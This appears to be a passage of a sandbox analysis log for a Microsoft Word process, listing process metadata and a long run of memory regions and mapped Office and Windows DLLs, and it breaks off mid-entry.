# Flog Txt Version 1 # Analyzer Version: 4.6.0 # Analyzer Build Date: Jul 8 2022 06:26:21 # Log Creation Date: 11.08.2022 17:07:25.172 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files (x86)\\microsoft office\\office16\\winword.exe" page_root = "0x78df1000" os_pid = "0x1350" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x7b4" cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE\" /n" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 255 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 256 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 257 start_va = 0x30000 end_va = 0x3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 258 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 259 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 260 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 261 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 262 start_va = 0x1b0000 end_va = 0x1b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 263 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 264 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 265 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 266 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 267 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 268 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 269 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 270 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 271 start_va = 0x510000 end_va = 0x60ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 272 start_va = 0x610000 end_va = 0x611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 273 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 274 start_va = 0x630000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 275 start_va = 0x730000 end_va = 0x8b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000730000" filename = "" Region: id = 276 start_va = 0x8c0000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 277 start_va = 0xa50000 end_va = 0xa50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 278 start_va = 0xa60000 end_va = 0xa61fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 279 start_va = 0xa70000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 280 start_va = 0xa80000 end_va = 0xa81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 281 start_va = 0xa90000 end_va = 0xa91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 282 start_va = 0xaa0000 end_va = 0xaa1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 283 start_va = 0xab0000 end_va = 0xab1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 284 start_va = 0xac0000 end_va = 0xac1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 285 start_va = 0xad0000 end_va = 0xad3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 286 start_va = 0xae0000 end_va = 0xae1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 287 start_va = 0xaf0000 end_va = 0xb98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\1033\\wwintl.dll") Region: id = 288 start_va = 0xba0000 end_va = 0xba4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 289 start_va = 0xbb0000 end_va = 0xbbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 290 start_va = 0xbc0000 end_va = 0xbcefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 291 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 292 start_va = 0xbe0000 end_va = 0xbe3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 293 start_va = 0xbf0000 end_va = 0xc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 294 start_va = 0xc70000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 295 start_va = 0xc80000 end_va = 0xc9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 296 start_va = 0xca0000 end_va = 0xe58fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 297 start_va = 0xe60000 end_va = 0x1167fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso40uires.dll") Region: id = 298 start_va = 0x1170000 end_va = 0x1347fff monitored = 0 entry_point = 0x1171000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\winword.exe") Region: id = 299 start_va = 0x1350000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001350000" filename = "" Region: id = 300 start_va = 0x2750000 end_va = 0x3070fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso99lres.dll") Region: id = 301 start_va = 0x3080000 end_va = 0x7ebefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\msores.dll") Region: id = 302 start_va = 0x7ec0000 end_va = 0x8034fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 303 start_va = 0x80b0000 end_va = 0x80effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000080b0000" filename = "" Region: id = 304 start_va = 0x80f0000 end_va = 0x80f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000080f0000" filename = "" Region: id = 305 start_va = 0x8100000 end_va = 0x81fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008100000" filename = "" Region: id = 306 start_va = 0x82b0000 end_va = 0x85e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 307 start_va = 0x85f0000 end_va = 0x86effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000085f0000" filename = "" Region: id = 308 start_va = 0x86f0000 end_va = 0x871dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000086f0000" filename = "" Region: id = 309 start_va = 0x8720000 end_va = 0x8720fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008720000" filename = "" Region: id = 310 start_va = 0x8730000 end_va = 0x8730fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008730000" filename = "" Region: id = 311 start_va = 0x8740000 end_va = 0x877ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008740000" filename = "" Region: id = 312 start_va = 0x8780000 end_va = 0x887ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008780000" filename = "" Region: id = 313 start_va = 0x8880000 end_va = 0x897ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008880000" filename = "" Region: id = 314 start_va = 0x8980000 end_va = 0x8980fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008980000" filename = "" Region: id = 315 start_va = 0x8990000 end_va = 0x8990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008990000" filename = "" Region: id = 316 start_va = 0x89a0000 end_va = 0x89dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089a0000" filename = "" Region: id = 317 start_va = 0x89e0000 end_va = 0x8adffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000089e0000" filename = "" Region: id = 318 start_va = 0x8ae0000 end_va = 0x8b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ae0000" filename = "" Region: id = 319 start_va = 0x8b20000 end_va = 0x8c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008b20000" filename = "" Region: id = 320 start_va = 0x8c20000 end_va = 0x8c68fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-system.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-System.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-system.dat") Region: id = 321 start_va = 0x8c70000 end_va = 0x8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008c70000" filename = "" Region: id = 322 start_va = 0x8d70000 end_va = 0x956ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-S-1-5-21-1560258661-3990802383-1811730007-1000.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-s-1-5-21-1560258661-3990802383-1811730007-1000.dat") Region: id = 323 start_va = 0x9570000 end_va = 0x996ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009570000" filename = "" Region: id = 324 start_va = 0x9970000 end_va = 0x9a2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009970000" filename = "" Region: id = 325 start_va = 0x9a30000 end_va = 0x9a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a30000" filename = "" Region: id = 326 start_va = 0x9a40000 end_va = 0x9f31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009a40000" filename = "" Region: id = 327 start_va = 0x9f40000 end_va = 0x9f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f40000" filename = "" Region: id = 328 start_va = 0x9f50000 end_va = 0x9f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 329 start_va = 0x9f60000 end_va = 0x9f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f60000" filename = "" Region: id = 330 start_va = 0x9fa0000 end_va = 0xa09ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009fa0000" filename = "" Region: id = 331 start_va = 0xa0a0000 end_va = 0xa0a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a0a0000" filename = "" Region: id = 332 start_va = 0xa0b0000 end_va = 0xa0effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0b0000" filename = "" Region: id = 333 start_va = 0xa0f0000 end_va = 0xa1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a0f0000" filename = "" Region: id = 334 start_va = 0xa1f0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a1f0000" filename = "" Region: id = 335 start_va = 0xa200000 end_va = 0xa23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 336 start_va = 0xa240000 end_va = 0xa27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a240000" filename = "" Region: id = 337 start_va = 0xa280000 end_va = 0xa283fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a280000" filename = "" Region: id = 338 start_va = 0xa290000 end_va = 0xa29ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a290000" filename = "" Region: id = 339 start_va = 0xa2a0000 end_va = 0xa2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a2a0000" filename = "" Region: id = 340 start_va = 0xa2e0000 end_va = 0xa2e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a2e0000" filename = "" Region: id = 341 start_va = 0xa2f0000 end_va = 0xa2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a2f0000" filename = "" Region: id = 342 start_va = 0xa300000 end_va = 0xa304fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 343 start_va = 0xa310000 end_va = 0xa310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a310000" filename = "" Region: id = 344 start_va = 0xa320000 end_va = 0xa320fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll") Region: id = 345 start_va = 0xa330000 end_va = 0xa33ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a330000" filename = "" Region: id = 346 start_va = 0xa340000 end_va = 0xa43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a340000" filename = "" Region: id = 347 start_va = 0xa440000 end_va = 0xa53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a440000" filename = "" Region: id = 348 start_va = 0xa540000 end_va = 0xad3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000a540000" filename = "" Region: id = 349 start_va = 0xad40000 end_va = 0xae3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ad40000" filename = "" Region: id = 350 start_va = 0xae40000 end_va = 0xae7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae40000" filename = "" Region: id = 351 start_va = 0xae80000 end_va = 0xaf7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ae80000" filename = "" Region: id = 352 start_va = 0xaf80000 end_va = 0xafbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000af80000" filename = "" Region: id = 353 start_va = 0xafc0000 end_va = 0xb0bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000afc0000" filename = "" Region: id = 354 start_va = 0xb0c0000 end_va = 0xb0fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0c0000" filename = "" Region: id = 355 start_va = 0xb100000 end_va = 0xb1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b100000" filename = "" Region: id = 356 start_va = 0xb340000 end_va = 0xb53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b340000" filename = "" Region: id = 357 start_va = 0xb540000 end_va = 0xb5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b540000" filename = "" Region: id = 358 start_va = 0xb5c0000 end_va = 0xb5d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db") Region: id = 359 start_va = 0xb5e0000 end_va = 0xb5e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b5e0000" filename = "" Region: id = 360 start_va = 0xb5f0000 end_va = 0xb6cffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 361 start_va = 0xb6d0000 end_va = 0xb6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6d0000" filename = "" Region: id = 362 start_va = 0xb6e0000 end_va = 0xb6e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b6e0000" filename = "" Region: id = 363 start_va = 0xb6f0000 end_va = 0xb6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000b6f0000" filename = "" Region: id = 364 start_va = 0xb700000 end_va = 0xb73ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b700000" filename = "" Region: id = 365 start_va = 0xb740000 end_va = 0xb83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b740000" filename = "" Region: id = 366 start_va = 0xb840000 end_va = 0xc83ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "~fontcache-fontface.dat" filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat") Region: id = 367 start_va = 0xc840000 end_va = 0xc91efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 368 start_va = 0xc920000 end_va = 0xc920fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c920000" filename = "" Region: id = 369 start_va = 0xc930000 end_va = 0xcd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c930000" filename = "" Region: id = 370 start_va = 0xcd30000 end_va = 0xcd71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "d2d1.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\d2d1.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\d2d1.dll.mui") Region: id = 371 start_va = 0xcd80000 end_va = 0xcd81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd80000" filename = "" Region: id = 372 start_va = 0xcd90000 end_va = 0xce65fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cd90000" filename = "" Region: id = 373 start_va = 0xce70000 end_va = 0xcf45fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ce70000" filename = "" Region: id = 374 start_va = 0xcf50000 end_va = 0xcf6efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf50000" filename = "" Region: id = 375 start_va = 0xcf70000 end_va = 0xcf8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000cf70000" filename = "" Region: id = 376 start_va = 0xd270000 end_va = 0xd27ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d270000" filename = "" Region: id = 377 start_va = 0xd280000 end_va = 0xd28ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d280000" filename = "" Region: id = 378 start_va = 0xd290000 end_va = 0xd29ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000d290000" filename = "" Region: id = 379 start_va = 0xd2a0000 end_va = 0xd6a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d2a0000" filename = "" Region: id = 380 start_va = 0xd6b0000 end_va = 0xdabdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d6b0000" filename = "" Region: id = 381 start_va = 0xdac0000 end_va = 0xdec9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dac0000" filename = "" Region: id = 382 start_va = 0xdee0000 end_va = 0xdf5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dee0000" filename = "" Region: id = 383 start_va = 0xdf60000 end_va = 0xdf70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 384 start_va = 0xdf80000 end_va = 0xefbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 385 start_va = 0xefc0000 end_va = 0xf49dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000efc0000" filename = "" Region: id = 386 start_va = 0x34400000 end_va = 0x3440ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000034400000" filename = "" Region: id = 387 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 388 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 389 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 390 start_va = 0x69660000 end_va = 0x69682fff monitored = 0 entry_point = 0x696769b0 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\SysWOW64\\globinputhost.dll" (normalized: "c:\\windows\\syswow64\\globinputhost.dll") Region: id = 391 start_va = 0x69690000 end_va = 0x696e1fff monitored = 0 entry_point = 0x696b8290 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\SysWOW64\\BCP47Langs.dll" (normalized: "c:\\windows\\syswow64\\bcp47langs.dll") Region: id = 392 start_va = 0x696f0000 end_va = 0x69821fff monitored = 0 entry_point = 0x6975bf60 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\SysWOW64\\Windows.Globalization.dll" (normalized: "c:\\windows\\syswow64\\windows.globalization.dll") Region: id = 393 start_va = 0x69830000 end_va = 0x69845fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 394 start_va = 0x69850000 end_va = 0x69870fff monitored = 0 entry_point = 0x6985bdb0 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 395 start_va = 0x69880000 end_va = 0x6a074fff monitored = 0 entry_point = 0x698e5279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\chart.dll") Region: id = 396 start_va = 0x6a080000 end_va = 0x6a112fff monitored = 0 entry_point = 0x6a0a0ec0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\SysWOW64\\twinapi.dll" (normalized: "c:\\windows\\syswow64\\twinapi.dll") Region: id = 397 start_va = 0x6a120000 end_va = 0x6a30efff monitored = 0 entry_point = 0x6a165e20 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll") Region: id = 398 start_va = 0x6a310000 end_va = 0x6a376fff monitored = 0 entry_point = 0x6a325a00 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 399 start_va = 0x6a380000 end_va = 0x6a388fff monitored = 0 entry_point = 0x6a383830 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 400 start_va = 0x6a390000 end_va = 0x6a3c3fff monitored = 0 entry_point = 0x6a3a8280 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 401 start_va = 0x6a3d0000 end_va = 0x6a571fff monitored = 0 entry_point = 0x6a3d1000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 402 start_va = 0x6a580000 end_va = 0x6a587fff monitored = 0 entry_point = 0x6a5817b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 403 start_va = 0x6a590000 end_va = 0x6a60cfff monitored = 0 entry_point = 0x6a5a0db0 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 404 start_va = 0x6a610000 end_va = 0x6a668fff monitored = 0 entry_point = 0x6a620780 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 405 start_va = 0x6a670000 end_va = 0x6a7e2fff monitored = 0 entry_point = 0x6a71d220 region_type = mapped_file name = "windowscodecs.dll" filename = 